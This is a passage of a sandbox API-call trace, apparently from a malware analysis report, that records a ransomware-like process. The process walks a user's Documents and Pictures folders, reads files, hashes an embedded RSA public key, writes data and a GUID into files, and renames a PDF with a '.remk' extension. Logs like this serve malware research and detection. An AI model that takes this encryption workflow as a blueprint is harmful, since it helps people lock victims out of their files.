returned 1 [0236.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc6c0 [0236.236] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0236.236] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc720 [0236.237] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6c0 | out: hHeap=0x630000) returned 1 [0236.237] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc6c0 [0236.237] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6d8 | out: hHeap=0x630000) returned 1 [0236.237] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed28 [0236.237] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.237] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0236.237] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0236.237] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0236.237] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc690 | out: hHeap=0x630000) returned 1 [0236.237] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc690 [0236.238] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x34aa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.238] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0236.238] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.238] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0236.238] CloseHandle (hObject=0x640) returned 1 [0236.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xe0) returned 0x6a2d00 [0236.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e0) returned 0x37bd408 [0236.246] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\t648 Z2T0mST-97jBqS\\RVx8gh-an-F-.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\t648 z2t0mst-97jbqs\\rvx8gh-an-f-.pdf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\t648 Z2T0mST-97jBqS\\RVx8gh-an-F-.pdf.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\t648 z2t0mst-97jbqs\\rvx8gh-an-f-.pdf.remk")) returned 1 [0236.249] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9484eb0, ftCreationTime.dwHighDateTime=0x1d5df77, ftLastAccessTime.dwLowDateTime=0x3b648540, ftLastAccessTime.dwHighDateTime=0x1d5e0ba, ftLastWriteTime.dwLowDateTime=0x3b648540, ftLastWriteTime.dwHighDateTime=0x1d5e0ba, nFileSizeHigh=0x0, nFileSizeLow=0x34aa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RVx8gh-an-F-.pdf", cAlternateFileName="RVX8GH~1.PDF")) returned 0 [0236.249] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0236.249] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0236.249] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3186060 [0236.249] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0236.249] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185d80 [0236.249] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0236.249] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\2kWa8l\\") returned="2kWa8l\\" [0236.249] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6420 [0236.250] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\") returned="4HUb e9qKHwuKHz-\\" [0236.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0236.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0236.250] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\") returned="_dqq7i08G7zkmy4eWB\\" [0236.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5808 [0236.250] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0236.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37ce910 [0236.250] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0236.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0236.250] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0236.250] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0236.250] PathFindFileNameW (pszPath="") returned="" [0236.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185d80 [0236.250] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\2kWa8l\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd92eb9a0, ftCreationTime.dwHighDateTime=0x1d5dbd6, ftLastAccessTime.dwLowDateTime=0x8a09690, ftLastAccessTime.dwHighDateTime=0x1d5d92f, ftLastWriteTime.dwLowDateTime=0x8a09690, ftLastWriteTime.dwHighDateTime=0x1d5d92f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0236.252] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd92eb9a0, ftCreationTime.dwHighDateTime=0x1d5dbd6, ftLastAccessTime.dwLowDateTime=0x8a09690, ftLastAccessTime.dwHighDateTime=0x1d5d92f, ftLastWriteTime.dwLowDateTime=0x8a09690, ftLastWriteTime.dwHighDateTime=0x1d5d92f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0236.253] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33b460, ftCreationTime.dwHighDateTime=0x1d5e07d, ftLastAccessTime.dwLowDateTime=0xa0a18690, ftLastAccessTime.dwHighDateTime=0x1d5db4e, ftLastWriteTime.dwLowDateTime=0xa0a18690, ftLastWriteTime.dwHighDateTime=0x1d5db4e, nFileSizeHigh=0x0, nFileSizeLow=0xf274, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8PkInFTYY.gif", cAlternateFileName="8PKINF~1.GIF")) returned 1 [0236.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185d80 [0236.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x106) returned 0x31f6b30 [0236.253] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\2kWa8l\\8PkInFTYY.gif") returned=".gif" [0236.253] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\2kWa8l\\8PkInFTYY.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\2kwa8l\\8pkinftyy.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0236.255] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=62068) returned 1 [0236.255] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0236.259] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xf24e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.259] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0236.261] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.261] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xf274, lpOverlapped=0x0) returned 1 [0236.262] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.262] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0236.262] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.262] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.262] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x6951f0) returned 1 [0236.264] CryptCreateHash (in: hProv=0x6951f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0236.264] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0236.264] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0236.264] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0236.264] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0236.264] GetLastError () returned 0x0 [0236.264] CryptDestroyHash (hHash=0x31de170) returned 1 [0236.264] CryptReleaseContext (hProv=0x6951f0, dwFlags=0x0) returned 1 [0236.264] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0236.264] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0236.264] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0236.264] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.264] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0236.264] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.264] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.264] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xf270) returned 0x37cf820 [0236.265] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0236.265] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0236.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0236.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0236.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0236.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37ce910 [0236.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc660 [0236.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37ce958 [0236.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc678 [0236.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc6a8 [0236.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc708 [0236.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc6c0 [0236.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0236.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0236.266] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0236.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0236.266] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6a8 | out: hHeap=0x630000) returned 1 [0236.266] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6c0 | out: hHeap=0x630000) returned 1 [0236.266] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc708 | out: hHeap=0x630000) returned 1 [0236.266] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0236.266] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc708 [0236.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0236.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc6c0 [0236.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0236.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bc6a8 [0236.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0236.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0236.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0236.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0236.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0236.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6d60 [0236.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0236.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0236.267] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0236.267] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6c0 | out: hHeap=0x630000) returned 1 [0236.267] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0236.267] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6a8 | out: hHeap=0x630000) returned 1 [0236.267] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0236.267] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.267] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc708 | out: hHeap=0x630000) returned 1 [0236.267] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0236.267] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0236.267] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1db0 | out: hHeap=0x630000) returned 1 [0236.267] GetCurrentThreadId () returned 0x314 [0236.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0236.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c5640 [0236.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0236.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0236.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0236.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0236.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0236.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0236.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.268] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.268] GetCurrentThreadId () returned 0x314 [0236.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.268] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0236.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.268] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.268] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.268] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0236.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0236.268] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0236.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0236.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0236.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0236.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc708 [0236.268] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0236.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0236.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0236.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0236.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0236.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0236.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0236.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc6a8 [0236.269] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0236.269] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0236.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0236.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0236.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0236.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc6c0 [0236.269] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0236.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0236.269] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0236.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc690 [0236.269] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0236.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc720 [0236.269] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0236.270] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0236.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc6f0 [0236.270] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc6d8 [0236.270] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0236.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc738 [0236.270] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6d8 | out: hHeap=0x630000) returned 1 [0236.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc6d8 [0236.270] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6f0 | out: hHeap=0x630000) returned 1 [0236.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0236.270] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0236.270] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0236.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0236.270] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6a8 | out: hHeap=0x630000) returned 1 [0236.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc6a8 [0236.270] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0236.270] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc708 | out: hHeap=0x630000) returned 1 [0236.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6e78 [0236.270] 